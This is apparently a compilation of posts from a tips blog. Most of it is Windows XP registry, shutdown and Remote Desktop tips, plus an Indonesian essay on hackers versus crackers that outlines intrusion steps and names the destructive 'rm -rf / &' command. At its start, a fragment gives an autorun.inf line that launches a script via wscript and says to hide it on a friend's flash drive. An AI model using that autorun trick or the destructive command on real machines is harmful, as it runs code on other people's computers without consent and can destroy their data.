  4942. [Autorun]
  4943. shellexecute=wscript.exe NAMAFILE.FORMAT
  4944. action=Have a nice day
  4945.  
  4946. ganti text warna merah NAMAFILE.FORMAT dengan nama file yang tadi dibuat
  4947. lalu save dengan nama ” autorun.inf” pilihan save as type pilih “all files”
  4948. Enter>selesai.
  4949. Langkah terakhir copy file autorun.inf dan file ke flashdisk/cd/disket teman anda. Kemudian hidden keduanya. Good luck !
  4950. Salam cybers…
  4951. original from : http://www.the-cybers-skills.blogspot.com
  4952. Bagaimana Untuk Menjadi Hacker
  4953. Sunday, June 06, 2010 1:26 PM
  4954. Hacker dengan keahliannya dapat melihat & memperbaiki kelemahan perangkat lunak di komputer; biasanya kemudian di publikasikan secara terbuka di Internet agar sistem menjadi lebih baik. Sialnya, segelintir manusia berhati jahat menggunakan informasi tersebut untuk kejahatan – mereka biasanya disebut cracker. Pada dasarnya dunia hacker & cracker tidak berbeda dengan dunia seni, disini kita berbicara seni keamanan jaringan Internet.
  4955.  
  4956. Saya berharap ilmu keamanan jaringan di tulisan ini digunakan untuk hal-hal yang baik – jadilah Hacker bukan Cracker. Jangan sampai anda terkena karma karena menggunakan ilmu untuk merusak milik orang lain. Apalagi, pada saat ini kebutuhan akan hacker semakin bertambah di Indonesia dengan semakin banyak dotcommers yang ingin IPO di berbagai bursa saham. Nama baik & nilai sebuah dotcom bisa jatuh bahkan menjadi tidak berharga jika dotcom di bobol. Dalam kondisi ini, para hacker di harapkan bisa menjadi konsultan keamanan bagi para dotcommers tersebut – karena SDM pihak kepolisian & aparat keamanan Indonesia amat sangat lemah & menyedihkan di bidang Teknologi Informasi & Internet. Apa boleh buat cybersquad, cyberpatrol swasta barangkali perlu di budayakan untuk survival dotcommers Indonesia di Internet.
  4957.  
  4958.  
  4959. Berbagai teknik keamanan jaringan Internet dapat di peroleh secara mudah di Internet antara lain di http://www.sans.org/, http://www.rootshell.com/, http://www.linuxfirewall.org/, http://www.linuxdoc.org/, http://www.cerias.purdue.edu/coast/firewalls/, http://www.redhat.com/mirrors/LDP/HOWTO/. Sebagian dari teknik ini berupa buku-buku yang jumlah-nya beberapa ratus halaman yang dapat di ambil secara cuma-cuma (gratis). Beberapa Frequently Asked Questions (FAQ) tentang keamanan jaringan bisa diperoleh di http://www.iss.net/vd/mail.html, http://www.v-one.com/documents/fw-faq.htm. Dan bagi para experimenter beberapa script / program yang sudah jadi dapat diperoleh antara lain di http://bastille-linux.sourceforge.net/, http://www.redhat.com/support/docs/tips/firewall/firewallservice.html.
  4960.  
  4961. Bagi pembaca yang ingin memperoleh ilmu tentang jaringan dapat di download secara cuma-cuma dari http://pandu.dhs.org/, http://www.bogor.net/idkf/, http://louis.idaman.com/idkf. Beberapa buku berbentuk softcopy yang dapat di ambil gratis dapat di ambil dari http://pandu.dhs.org/Buku-Online/. Kita harus berterima kasih terutama kepada team Pandu yang dimotori oleh I Made Wiryana untuk ini. Pada saat ini, saya tidak terlalu tahu adanya tempat diskusi Indonesia yang aktif membahas teknik-teknik hacking ini – tetapi mungkin bisa sebagian di diskusikan di mailing list lanjut seperti kursus-linux@yahoogroups.c
  4962. om & linux-admin@linux.or.id yang di operasikan oleh Kelompok Pengguna Linux Indonesia (KPLI) http://www.kpli.or.id/.
  4963.  
  4964. Cara paling sederhana untuk melihat kelemahan sistem adalah dengan cara mencari informasi dari berbagai vendor misalnya di http://www.sans.org/newlook/publications/roadmap.htm#3b tentang kelemahan dari sistem yang mereka buat sendiri. Di samping, memonitoring berbagai mailing list di Internet yang berkaitan dengan keamanan jaringan seperti dalam daftar http://www.sans.org/newlook/publications/roadmap.htm#3e.
  4965.  
  4966. Dijelaskan oleh Front-line Information Security Team, “Techniques Adopted By ‘System Crackers’ When Attempting To Break Into Corporate or Sensitive Private Networks,” fist@ns2.co.uk http://www.ns2.co.uk/. Seorang Cracker umumnya pria usia 16-25 tahun. Berdasarkan statistik pengguna Internet di Indonesia maka sebetulnya mayoritas pengguna Internet di Indonesia adalah anak-anak muda pada usia ini juga. Memang usia ini adalah usia yang sangat ideal dalam menimba ilmu baru termasuk ilmu Internet, sangat disayangkan jika kita tidak berhasil menginternetkan ke 25000 sekolah Indonesia s/d tahun 2002 – karena tumpuan hari depan bangsa Indonesia berada di tangan anak-anak muda kita ini.
  4967.  
  4968. Nah, para cracker muda ini umumnya melakukan cracking untuk meningkatkan kemampuan / menggunakan sumber daya di jaringan untuk kepentingan sendiri. Umumnya para cracker adalah opportunis. Melihat kelemahan sistem dengan mejalankan program scanner. Setelah memperoleh akses root, cracker akan menginstall pintu belakang (backdoor) dan menutup semua kelemahan umum yang ada.
  4969.  
  4970. Seperti kita tahu, umumnya berbagai perusahaan / dotcommers akan menggunakan Internet untuk (1) hosting web server mereka, (2) komunikasi e-mail dan (3) memberikan akses web / internet kepada karyawan-nya. Pemisahan jaringan Internet dan IntraNet umumnya dilakukan dengan menggunakan teknik / software Firewall dan Proxy server. Melihat kondisi penggunaan di atas, kelemahan sistem umumnya dapat di tembus misalnya dengan menembus mailserver external / luar yang digunakan untuk memudahkan akses ke mail keluar dari perusahaan. Selain itu, dengan menggunakan agressive-SNMP scanner & program yang memaksa SNMP community string dapat mengubah sebuah router menjadi bridge (jembatan) yang kemudian dapat digunakan untuk batu loncatan untuk masuk ke dalam jaringan internal perusahaan (IntraNet).
  4971.  
  4972. Agar cracker terlindungi pada saat melakukan serangan, teknik cloacking (penyamaran) dilakukan dengan cara melompat dari mesin yang sebelumnya telah di compromised (ditaklukan) melalui program telnet atau rsh. Pada mesin perantara yang menggunakan Windows serangan dapat dilakukan dengan melompat dari program Wingate. Selain itu, melompat dapat dilakukan melalui perangkat proxy yang konfigurasinya kurang baik.
  4973.  
  4974. Setelah berhasil melompat dan memasuki sistem lain, cracker biasanya melakukan probing terhadap jaringan dan mengumpulkan informasi yang dibutuhkan. Hal ini dilakukan dengan beberapa cara, misalnya (1) menggunakan nslookup untuk menjalankan perintah ‘ls ’ , (2) melihat file HTML di webserver anda untuk mengidentifikasi mesin lainnya, (3) melihat berbagai dokumen di FTP server, (4) menghubungkan diri ke mail server dan menggunakan perintah ‘expn ’, dan (5) mem-finger user di mesin-mesin eksternal lainnya.
  4975.  
  4976. Langkah selanjutnya, cracker akan mengidentifikasi komponen jaringan yang dipercaya oleh system apa saja. Komponen jaringan tersebut biasanya mesin administrator dan server yang biasanya di anggap paling aman di jaringan. Start dengan check akses & eksport NFS ke berbagai direktori yang kritis seperti /usr/bin, /etc dan /home. Eksploitasi mesin melalui kelemahan Common Gateway Interface (CGI), dengan akses ke file /etc/hosts.allow.
  4977.  
  4978. Selanjutnya cracker harus mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan. Cracker bisa mengunakan program di Linux seperti ADMhack, mscan, nmap dan banyak scanner kecil lainnya. Program seperti ‘ps’ & ‘netstat’ di buat trojan (ingat cerita kuda troya? dalam cerita klasik yunani kuno) untuk menyembunyikan proses scanning. Bagi cracker yang cukup advanced dapat mengunakan aggressive-SNMP scanning untuk men-scan peralatan dengan SNMP.
  4979.  
  4980. Setelah cracker berhasil mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan, maka cracker akan menjalan program untuk menaklukan program daemon yang lemah di server. Program daemon adalah program di server yang biasanya berjalan di belakang layar (sebagai daemon / setan). Keberhasilan menaklukan program daemon ini akan memungkinkan seorang Cracker untuk memperoleh akses sebagai ‘root’ (administrator tertinggi di server).
  4981.  
  4982. Untuk menghilangkan jejak, seorang cracker biasanya melakukan operasi pembersihan ‘clean-up’ operation dengan cara membersihkan berbagai log file. Dan menambahkan program untuk masuk dari pintu belakang ‘backdooring’. Mengganti file .rhosts di /usr/bin untuk memudahkan akses ke mesin yang di taklukan melalui rsh & csh.
  4983.  
  4984. Selanjutnya seorang cracker dapat menggunakan mesin yang sudah ditaklukan untuk kepentingannya sendiri, misalnya mengambil informasi sensitif yang seharusnya tidak dibacanya; mengcracking mesin lain dengan melompat dari mesin yang di taklukan; memasang sniffer untuk melihat / mencatat berbagai trafik / komunikasi yang lewat; bahkan bisa mematikan sistem / jaringan dengan cara menjalankan perintah ‘rm -rf / &’. Yang terakhir akan sangat fatal akibatnya karena sistem akan hancur sama sekali, terutama jika semua software di letakan di harddisk. Proses re-install seluruh sistem harus di lakukan, akan memusingkan jika hal ini dilakukan di mesin-mesin yang menjalankan misi kritis.
  4985.  
  4986. Oleh karena itu semua mesin & router yang menjalankan misi kritis sebaiknya selalu di periksa keamanannya & di patch oleh software yang lebih baru. Backup menjadi penting sekali terutama pada mesin-mesin yang menjalankan misi kritis supaya terselamatkan dari ulah cracker yang men-disable sistem dengan ‘rm -rf / &’.
  4987.  
  4988. Bagi kita yang sehari-hari bergelut di Internet biasanya justru akan sangat menghargai keberadaan para hacker (bukan Cracker). Karena berkat para hacker-lah Internet ada dan dapat kita nikmati seperti sekarang ini, bahkan terus di perbaiki untuk menjadi sistem yang lebih baik lagi. Berbagai kelemahan sistem di perbaiki karena kepandaian rekan-rekan hacker yang sering kali mengerjakan perbaikan tsb. secara sukarela karena hobby-nya. Apalagi seringkali hasil hacking-nya di sebarkan secara cuma-cuma di Internet untuk keperluan masyarakat Internet. Sebuah nilai & budaya gotong royong yang mulia justru tumbuh di dunia maya Internet yang biasanya terkesan futuristik dan jauh dari rasa sosial.
  4989.  
  4990. Pengembangan para hobbiest hacker ini menjadi penting sekali untuk keberlangsungan / survival dotcommers di wahana Internet Indonesia. Sebagai salah satu bentuk nyatanya, dalam waktu dekat Insya Allah sekitar pertengahan April 2001 akan di adakan hacking competition di Internet untuk membobol sebuah server yang telah di tentukan terlebih dahulu. Hacking competition tersebut di motori oleh anak-anak muda di Kelompok Pengguna Linux Indonesia (KPLI) Semarang yang digerakan oleh anak muda seperti Kresno Aji (masaji@telkom.net), Agus Hartanto (hartx@writeme.com) & Lekso Budi Handoko (handoko@riset.dinus.ac.id). Seperti umumnya anak-anak muda lainnya, mereka umumnya bermodal cekak – bantuan & sponsor tentunya akan sangat bermanfaat dan dinantikan oleh rekan-rekan muda ini.
  4991.  
  4992. Mudah-mudahan semua ini akan menambah semangat pembaca, khususnya pembaca muda, untuk bergerak di dunia hacker yang mengasyikan dan menantang. Kalau kata Captain Jean Luc Picard di Film Startrek Next Generation, “To boldly go where no one has gone before”.
  4993.  
  4994. Penulis: Onno W Purbo
  4995. original from : http://www.the-cybers-skills.blogspot.com
  4996. Speed up your network browsing
  4997. Sunday, June 06, 2010 1:28 AM
  4998.  
  4999. Speed up your network browsing by tweaking your registry.
  5000.  
  5001.  
  5002. When you use My Network Places to browse for other machines on your network, it usually takes a long time to display the list of shared resources for the target machine. This is because Windows XP first checks for the scheduled tasks on the target machine before listing the shared resources present on the computer.
  5003.                          
  5004.  
  5005.  
  5006.    
  5007.          
  5008.  
  5009. To schedule a task using Windows XP's Scheduled Tasks, choose Start Programs Accessories System Tools Scheduled Tasks.
  5010.                    
  5011.  
  5012.  
  5013. This unnecessary checking can easily add 30 seconds of delay. You can decrease the time browsing takes by modifying the Registry to turn off this checking:
  5014.  
  5015.  
  5016.   1. Invoke the Registry Editor by      typing regedit  at the      command line.
  5017.   2. Open the Registry key:
  5018.  
  5019.  
  5020.  
  5021. 3.           HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
  5022.  
  5023.  
  5024. Remote Computer\NameSpace    
  5025.  
  5026.  
  5027.   1. Delete the following key (the      value for it is the Scheduled Tasks, as shown in Figure 5-25)
  5028.  
  5029.  
  5030.  
  5031. {D6277990-4C6A-11CF-8D87-00AA0060F5BF}
  5032.  
  5033.  
  5034.   1. Close the Registry and reboot.
  5035.  
  5036.  
  5037.  
  5038. Figure 5-25. Modifying the registry
  5039.  
  5040. That's it! You should now be able to browse to another computer on the network without much delay.
  5041. original from : http://www.the-cybers-skills.blogspot.com
  5042. Miscellaneous Startup and Shutdown Hacks
  5043. Sunday, June 06, 2010 1:27 AM
  5044.  
  5045. A grab bag of ways to customize the way you start up and shut down your system.
  5046.  
  5047.  
  5048. There are many small ways that you can control the way you start up and shut down your PC. This grab bag of four hacks shows you the best of them.
  5049.  
  5050.  
  5051. 1. Create One-Click Shutdown and Reboot Shortcuts
  5052.  
  5053.  
  5054. Turning off or rebooting XP involves a several-step process: click the Start menu, choose Shut Down, and then select Shut Down or Restart. If you want, however, you can exit or reboot much more quickly, by creating a shortcut that enables one-click shutdowns. You can also use the shortcut to customize the shutdown or reboot—for example, by displaying a specific message or automatically shutting down any programs that are running.
  5055.  
  5056.  
  5057. First, create a shortcut on your desktop by right-clicking on the desktop, choosing New, and then choosing Shortcut. The Create Shortcut Wizard appears. In the box asking for the location of the shortcut, type shutdown. After you create the shortcut, double-clicking on it will shut down your PC.
  5058.  
  5059.  
  5060. But you can do much more with a shutdown shortcut than merely shut down your PC. You can add any combination of several switches to do extra duty, like this:
  5061.  
  5062.  
  5063. shutdown -r -t 01 -c "Rebooting your PC"
  5064.  
  5065.  
  5066. Double-clicking on that shortcut will reboot your PC after a one-second delay and display the message "Rebooting your PC." The shutdown command includes a variety of switches you can use to customize it.lists all of them and describes their use.
  5067.  
  5068.  
  5069. I use this technique to create two shutdown shortcuts on my desktop—one for turning off my PC, and one for rebooting. Here are the ones I use:
  5070.  
  5071.  
  5072. shutdown -s -t 03 -c "See you later!"
  5073.  
  5074.  
  5075. shutdown -r -t 03 -c "You can't get rid of me that quickly!"
  5076.              
  5077.  
  5078. Table 1-3. Switches you can use with shutdown
  5079.                  
  5080.  
  5081. Switch
  5082.            
  5083.  
  5084. What it does
  5085.                
  5086.  
  5087. -s
  5088.        
  5089.  
  5090. Shuts down   the PC.
  5091.            
  5092.  
  5093. -l
  5094.        
  5095.  
  5096. Logs off   the current user.
  5097.            
  5098.  
  5099. -t nn
  5100.        
  5101.  
  5102. Indicates   the duration of delay, in seconds, before performing the action.
  5103.            
  5104.  
  5105. -c "messagetext"
  5106.        
  5107.  
  5108. Displays a message in the System Shutdown window. A maximum of 127 characters can be used. The message must be enclosed in quotation marks.
  5109.            
  5110.  
  5111. -f
  5112.        
  5113.  
  5114. Forces any   running applications to shut down.
  5115.            
  5116.  
  5117. -r
  5118.        
  5119.  
  5120. Reboots   the PC.
  5121.        
  5122.  
  5123. 2. Automatically Turn On Num Lock, Scroll Lock, and Caps Lock
  5124.  
  5125.  
  5126. When you start your PC, Num Lock, Scroll Lock, and Caps Lock don't automatically toggle on. You can automatically turn each of them on or off whenever your PC starts, for all accounts on the PC. As a practical matter, most people probably want to have only Num Lock automatically turned on, but this Registry hack gives you the power to force any combination of keys on or off. Run the Registry Editor and go to HKEY_USERS\.Default\Control Panel\Keyboard. Find the String value InitialKeyboardIndicators. By default, it is set to 0, which means that Num Lock, Scroll Lock, and Caps Lock are all turned off. Set it to any of the following values, depending on the combination of keys you want turned on or off:
  5127.  
  5128.  
  5129. 0
  5130.  
  5131.  
  5132. Turns off Num Lock, Caps Lock, and Scroll Lock
  5133.  
  5134.  
  5135. 1
  5136.  
  5137.  
  5138. Turns on Caps Lock
  5139.  
  5140.  
  5141. 2
  5142.  
  5143.  
  5144. Turns on Num Lock
  5145.  
  5146.  
  5147. 3
  5148.  
  5149.  
  5150. Turns on Caps Lock and Num Lock
  5151.  
  5152.  
  5153. 4
  5154.  
  5155.  
  5156. Turns on Scroll Lock
  5157.  
  5158.  
  5159. 5
  5160.  
  5161.  
  5162. Turns on Caps Lock and Scroll Lock
  5163.  
  5164.  
  5165. 6
  5166.  
  5167.  
  5168. Turns on Num Lock and Scroll Lock
  5169.  
  5170.  
  5171. 7
  5172.  
  5173.  
  5174. Turns on Caps Lock, Num Lock, and Scroll Lock
  5175.  
  5176.  
  5177. Exit the Registry. When you restart, the new setting will take effect.
  5178.  
  5179.  
  5180. 3. Stop Error Messages from Displaying on Startup
  5181.  
  5182.  
  5183. If you constantly see an error message that you can't get rid of—for example, from a piece of software that didn't uninstall properly and continues to give errors on startup—you can disable it from displaying on startup. Run the Registry Editor and go to HKEY_LOCAL MACHINE\SYSTEM\CurrentControlSet\Control\Windows. (This key holds a variety of Windows system settings, such as the location of your system directory.) Create a new DWORD called NoPopupsOnBoot and give it a value of 1. Exit the Registry and reboot for the setting to take effect. To disable it, either delete the DWORD value or give it a value of 0.
  5184.  
  5185.  
  5186. 4. Give More Time for Processes to Close at Shutdown
  5187.  
  5188.  
  5189. When you shut down Windows, XP gives each process, service or application 20 seconds to close before the operating system turns off the computer. If the process, service, or application doesn't shut down within 20 seconds, a dialog box appears, prompting you to either wait 20 more seconds, immediately end the process, service, or application, or cancel shutdown.
  5190.  
  5191.  
  5192. If this dialog box appears frequently, you may be running an application, service, or process that often takes more than 20 seconds to close. To solve the problem, you can increase the amount of time that XP waits to display the dialog box so that the dialog box will no longer appear. To do so, run the Registry Editor and go to HKEY_CURRENT_USER\Control Panel\Desktop. Look for the String value WaitToKillAppTimeout. Edit the value by entering the amount of time you want XP to wait before displaying the dialog box, in milliseconds. The default is 20000, or 20 seconds. If you want XP to wait 25 seconds, enter the value of 25000. Exit the Registry and reboot.
  5193. original from : http://www.the-cybers-skills.blogspot.com
  5194. Control User Logins by Hacking the Registry
  5195. Sunday, June 06, 2010 1:26 AM
  5196.  
  5197. Make better use of the XP login screen.
  5198.  
  5199.  
  5200. If there is more than one user account on your system, or if you've set up XP to require logins, you'll have to log in to XP before you can begin to use it. But you needn't stay with the default XP login rules; you can use a single Registry key to customize how you log in. For example, you can display custom text before login, and you can remind anyone with an account on the PC to change their password a certain number of days prior to the password's expiration.
  5201.  
  5202.  
  5203. To control logon options, run the Registry Editor and go to the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon subkey, which contains a variety of logon settings (as well as some settings not having to do directly with logons). Following are the most important values you can edit to customize logons.
  5204.  
  5205.  
  5206. DontDisplayLastUserName
  5207.  
  5208.  
  5209. This setting lets you control how the system logon dialog box is used. If this String value is present and set to 1, all users will have to enter both their username and password in order to log on. If the value is 0, the name of the last user to log on will be displayed in the system logon dialog box.
  5210.  
  5211.  
  5212. DefaultUserName
  5213.  
  5214.  
  5215. This String value contains the name of the last user who logged on. It will be displayed only if the DontDisplayLastUserName value is not present or is set to 0.
  5216.  
  5217.  
  5218. LegalNoticeCaption
  5219.  
  5220.  
  5221. This String value, used in concert with the LegalNoticeText value, displays a dialog box prior to logon that contains any text you want to display. (The text doesn't have to be a legal notice, but this value is often used for that purpose.) The box has a title and text. The LegalNoticeCaption value will be the dialog box's title.
  5222.  
  5223.  
  5224. LegalNoticeText
  5225.  
  5226.  
  5227. This String value, used in concert with LegalNoticeCaption, contains the text that you want to be displayed inside a dialog box displayed prior to logon.
  5228.  
  5229.  
  5230. PasswordExpiryWarning
  5231.  
  5232.  
  5233. This DWORD value lets you display a warning message to users a certain number of days before their passwords are set to expire. It lets you determine how many days ahead of time the warning should be issued. To edit the value, click on the decimal button and enter the number of days.
  5234.  
  5235.  
  5236. ShutdownWithoutLogon
  5237.  
  5238.  
  5239. This String value enables or disables a button on the XP logon dialog box that lets the system be shutdown. A value of 1 enables the button (so that it is shown); a value of 0 disables the button (so that it is not shown).
  5240.  
  5241.  
  5242. Shell
  5243.  
  5244.  
  5245. This String value really doesn't have to do with logons, but it's one you should know about. It determines the shell—the user interface—that will be used by XP. The default is Explorer.exe, but it can be another shell as well—for example, the Program Manager from older Windows versions. Type in the name of the program—for example, Progman.exe for Program Manager, or Taskman.exe for the Task Manager.
  5246.  
  5247.  
  5248. AutoRestartShell
  5249.  
  5250.  
  5251. This DWORD value doesn't have to do with logons either, but it's another good one to know. It sets whether to automatically restart the Windows shell if the shell crashes. A value of 1 automatically restarts the shell. A value of 0 tells XP not to restart the shell, forcing you to log off and then back on again to restart it.
  5252. original from : http://www.the-cybers-skills.blogspot.com
  5253. Hack the Start Menu and Taskbar
  5254. Sunday, June 06, 2010 1:25 AM
  5255.  
  5256. XP Professional's Group Policy Editor gives you instant access to changing more than three dozen interface settings. Here's how to use it to create your own personalized Start Menu and Taskbar.
  5257.  
  5258.  
  5259. XP Professional's Group Policy Editor does more than just customize the Control Panel it gives you control over many aspects of XP's interface as well—in particular, the Start Menu and Taskbar. In fact, it gives you quick access to over three dozen separate settings for them.
  5260.  
  5261.  
  5262. Run the Group Policy Editor by typing gpedit.msc at the Run prompt or command line. Go to User Configuration\Administrative Templates\Start Menu and Taskbar. As you can see in Figure 2-5, the right pane displays all the settings you can change. If you click on the Extended tab at the bottom of the screen, you'll be shown a description of the setting that you've highlighted, along with an explanation of each of the options. Settings you can customize include showing the My Pictures icon, the Run menu, and the My Music icon on the Start Menu; locking the Taskbar so that it can't be customized; and many others. To change a setting, double-click on it and choose the options from the menu it displays.
  5263.  
  5264.  
  5265. Figure 2-5. Customizing the Start Menu and Taskbar in the group policy editor
  5266.  
  5267. There's not room in this hack to go into detail about each of the settings you can change, so I'll tell you about some of my favorites. I've never been a big fan of My Documents, My Pictures, and My Music. In fact, I never use those folders, so there's no point having them on the Start Menu. The settings in the Group Policy Editor let you get rid of them.
  5268.  
  5269.  
  5270. If you share your PC with other people, the Group Policy Editor is a great way to make sure that no one can change the Start Menu and Taskbar except you. So when you have the Start Menu and Taskbar working the way you like, they'll stay that way until you want to change them. Enable "Prevent changes to Taskbar and Start Menu Settings," and no one will be able to change their settings except you. Select "Remove Drag-and-drop context menus on the Start Menu," and no one except you will be able to remove or reorder items on the Start Menu. You can even stop anyone else from shutting down Windows by selecting "Remove and prevent access to the Shut Down command." (Of course, they can still shut down your PC the old-fashioned way: using the power switch.)
  5271.  
  5272.  
  5273. Among the many entries here are a lot of pointless ones, by the way. You can remove the Log Off entry on the Start Menu, for example, which certainly isn't high on my list of must-haves. But who knows, you may want to do that or any of the many other changes the Group Policy Editor allows. Go in there yourself and muck around; you'll find plenty to change.
  5274.  
  5275.  
  5276.  Hack the Taskbar with TweakUI
  5277.  
  5278.  
  5279. TweakUI can be used to hack the Taskbar to a limited degree. Go to its Taskbar section, and you can disable or enable balloon tips, and enable or disable warnings when you're low on disk space. Underneath the Taskbar section, you'll find a Grouping subsection that controls how Taskbar "grouping" works. When you run too many programs with too many files open, all can't fit individually on the Taskbar. So, XP groups files from the same application with each other. For example, if you have four Word files open, it shows only a single icon for Word on the Taskbar, with the number 4 inside it. Click on the icon, and a list of all four files pops up. You can then choose which to open. TweakUI lets you control how that grouping works; you can decide whether to first group applications with the most windows, or instead first group applications that you use the least. You can also choose to group all applications with two or more windows open, three or more windows open, and so on.
  5280. original from : http://www.the-cybers-skills.blogspot.com
  5281. Remove "Unremovable" Desktop Icons
  5282. Sunday, June 06, 2010 1:24 AM
  5283.  
  5284. To create your own customized XP interface, you need to be able to remove certain desktop icons. A Registry hack lets you remove any you want, including those apparently protected by XP.
  5285.  
  5286.  
  5287. Creating the perfect, customized XP interface doesn't only mean changing icons; it also means removing them. For example, many power users look down their nose at America Online, and yet, on many systems, that icon can't be removed easily.
  5288.  
  5289.  
  5290. America Online isn't the only icon protected this way; many others are as well. Which desktop icons are protected on your system will depend on your exact version of XP (for example, SP-1) and the manufacturer of your PC. The Recycle Bin is protected on all versions, but the America Online icon is protected on some systems, and not on others.
  5291.  
  5292.  
  5293. To customize XP to your liking, you'll want to be able to delete these protected icons. To do so, you'll need a Registry hack. Run the Registry Editor and go to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace. Here's where you'll find various special desktop icons. They're not listed by name, but instead by CLSID—for example, {645FF040-5081-101B-9F08-00AA002F954E} for the Recycle Bin.
  5294.  
  5295.  
  5296. To remove an icon from the desktop, simply delete the key of the icon—for example, {645FF040-5081-101B-9F08-00AA002F954E} for the Recycle Bin. Then exit the Registry, go to your Desktop, and press F5 to refresh the screen. The Recycle Bin icon should now be gone.
  5297.                          
  5298.  
  5299.  
  5300.                
  5301.  
  5302. On some systems, the icons may not be deleted immediately. Instead, after making the Registry change, you might have to right-click on the icon and choose Delete.
  5303.                      
  5304.    
  5305.  
  5306. Some CLSIDs in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace can be deleted from the desktop without having to go through this procedure, but when you try to delete them they may give you a special warning message. For example, when you try to delete Microsoft Outlook from the Desktop, you get the warning message "The Outlook Desktop icon provides special functionality and we recommend that you do not remove it." If you'd like, you can edit that message to display whatever you want. In the CLSID's subkey—for example, {00020D75-0000-0000-C000-000000000046} for Microsoft Outlook—you'll find the value Removal Message. Edit this value to whatever text you want, and your warning message will appear whenever someone tries to delete the icon.
  5307.  
  5308.  
  5309. Keep in mind that when you remove desktop icons you're removing only icons, not the underlying feature or program. So, the Recycle Bin still works even if you remove its icon. To open the Recycle Bin, go to C:\RECYCLER and open the folder inside it. To restore an item that's been deleted, right-click on it and choose Properties>Restore. Delete items as you would any other item.
  5310.                          
  5311.  
  5312.  
  5313.                
  5314.  
  5315. Some manufacturers make America Online an unremovable desktop icon. If that's the case with your PC and you want to remove it, delete the CLSID {955B7B84-5308-419c-8ED8-0B9CA3C56985}. America Online will still     work, but its icon will no longer be on the desktop.
  5316. original from : http://www.the-cybers-skills.blogspot.com
  5317. Control Another PC with Remote Access
  5318. Saturday, December 04, 2010 7:20 PM
  5319. You can control a computer—virtually moving its mouse and typing on its keyboard—over the Internet, using either Windows XP's built-in features or a third-party program.
  5320. When you are at work, wouldn't it be nice if you could log onto your home computer to check your email or find a file you took home? How about using your home or office desktop computer from your laptop on the road? You can use a remote control program to use another computer over the Internet, viewing its screen on your screen and giving commands via your mouse and keyboard. Windows XP comes with a feature called Remote Desktop, or you can use a third-party program. Windows Messenger also enables people who are chatting to share control of each other's computers.
  5321. The computer you will control is called the remote server , and the computer you are actually sitting in front of is the remote client. Windows XP comes with a remote client program (Remote Desktop Connection), and Windows XP Professional comes with a remote server (Remote Desktop) that works with one client at a time—that is, one computer can "take over" your computer remotely (with luck, it'll be you doing the takeover!).
  5322. Remote Access Server (RAS) on Windows NT or 2000     servers and the Routing and Remote Access utility on Windows Server 2003 both act as remote servers that allow multiple remote clients to connect.
  5323.  
  5324. Windows XP Home Edition can't act as a remote server; if you need to be able to access a Home Edition system remotely, you need to upgrade to Windows XP Professional or use a third-party program. We recommend VNC, the small, free, open source program from the University of Cambridge Department of Engineering (information and free downloads are available at http://www.uk.research.att.com/vnc).
  5325. 1. Configuring the Windows XP Remote Server
  5326. If you want to be able to control your Windows XP Professional system remotely, set it up as a remote server. Using an administrator user account, choose Start >Control Panel >Performance and Maintenance >System (or press the Windows-Break key), click the Remote tab, select the checkbox in the Remote Desktop section of the tab to enable incoming connections ("Allow users to connect remotely to this computer"), and click the Select Remote Users if you want to control which user accounts can be used by remote clients. (Windows automatically allows connections from the current user, along with all user accounts in the local Administrators and Remote Desktop Users groups.)
  5327. Normally, remote clients connect to the server via a local area network or a permanent Internet connection. However, you can also configure the remote server to accept incoming phone calls if you have a dial-up modem. Create a dial-up connection that accepts incoming calls by running the New Connection Wizard (click "Create a new connection" from the task pane in the Network Connections window). Choose "Set up an advanced connection" as the Network Connection Type, choose "Accept incoming connections," choose your modem, choose whether to accept VPN connections, and choose which user accounts the incoming connection can connect to.
  5328. Firewalls usually refuse remote access connections and, so if you want your remote server to be accessible from the Internet, you need to open a port in your computer's firewall. Remote Desktop uses port 3389. If you use Windows XP's built-in firewall, display the Network Connections window, right-click the Internet connection, choose properties from the shortcut menu, click the Advanced tab, and click Settings to display the Advanced Settings dialog box. Click the Remote Desktop checkbox; if the Service Settings dialog box appears, just click OK.
  5329. If you want to change the Remote Desktop server port to a number other than 3389 (perhaps to decrease the likelihood of hackers breaking through it), see the Microsoft Knowledge Base article Q187623 (at http://support.microsoft.com/,     type the article number in the "Search the Knowledge Base" box).
  5330.  
  5331. When you connect from your remote client (described later in this hack), you need to provide a domain name or IP address. If your computer connects via a dial-up, DSL, or cable connection, its IP address changes each time you connect, and the computer doesn't have a domain name. One solution is to have someone at the remote server display the Network Connections window, right-click the Internet connection, choose Status from the shortcut menu, click the Support tab, and call, IM, or email you with the IP address that appears. However, this solution is no good if no one is available to do this. Instead, you can sign up for a dynamic DNS service at http://www.dyndns.org/ or http://www.tzo.com/. The dynamic DNS service at DynDNS.org gives you a free domain name in the form they offer several dozen domain names to which you can add your name). TZO.com provides a subdomain at http://www.tzo.com/ for $25 per year. You install a small utility on your computer that automatically tells the dynamic DNS whenever your computer's IP address changes.
  5332. One final configuration note: when a client connects to your server via Remote Desktop, the user logs into one of the Windows XP user accounts. You can't log into accounts that have no password. Choose which account you plan for remote user(s) to log in with, and give it a password.
  5333. 2. Setting Up the Remote Client
  5334. To set up the remote client software that comes with Windows XP, connect to the Internet and then choose Start >All Programs >Accessories >Communications >Remote Desktop Connection. (If it's not there, you need to install it from your Windows CD.) In the Remote Desktop Connection window, type the domain name or IP address of the server computer and click Connect. Log on with the Windows XP user account and password for the remote server. Your computer screen now shows what's on the screen of the server computer. A connection bar appears as a button on the screen, showing the IP address of the remote server, along with Minimize, Restore, and Maximize buttons you can use to resize the remote client window.
  5335. Once you're connected, you can cut and paste information from the remote client window to other windows. You can also use local files in your remote session; your local disk drives appear in My Computer (Windows Explorer). When you print from the remote client, the print job goes to your default local printer, not the printer on the server.
  5336. original from : http://www.the-cybers-skills.blogspot.com
  5337. Repair a Broken TCP/IP Connection
  5338. Sunday, June 06, 2010 1:22 AM
  5339.  
  5340. Get back onto the Internet fast if you have TCP/IP woes.
  5341.  
  5342.  
  5343. TCP/IP problems can be exceedingly difficult to troubleshoot, and at times they appear to break for no apparent reason. Everything looks like it should be working, but you're not able to connect using the protocols. If you have a broken connection, try the following:
  5344.  
  5345.  
